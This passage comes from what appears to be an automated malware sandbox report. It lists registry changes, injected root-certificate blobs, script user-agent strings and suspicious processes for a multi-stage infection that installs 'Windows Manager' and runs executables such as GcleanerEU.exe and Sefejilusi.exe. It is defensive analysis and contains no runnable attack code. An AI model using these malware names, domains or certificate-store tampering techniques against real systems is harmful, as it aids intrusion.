iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "338235609" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "948" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "90" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "9" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DOMStorage\expensivesurvey.online\Total = "863" IEXPLORE.EXE -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe -
Modifies registry class 24 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" msiexec.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun150faeb3537d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun150faeb3537d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a services64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun150faeb3537d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 services64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun150faeb3537d.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 136 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 68 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
pid Process 3420 GcleanerEU.exe 3504 installer.exe 3612 anyname.exe 3796 gcleaner.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1048 powershell.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2624 ultramediaburner.tmp 2624 ultramediaburner.tmp 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2328 setup_2.tmp 2328 setup_2.tmp 544 WerFault.exe 544 WerFault.exe 544 WerFault.exe 544 WerFault.exe 544 WerFault.exe 544 WerFault.exe 544 WerFault.exe 544 WerFault.exe 2716 Chrome 5.exe 2476 7911299.exe 2388 6581194.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 704 WerFault.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 2996 Sefejilusi.exe 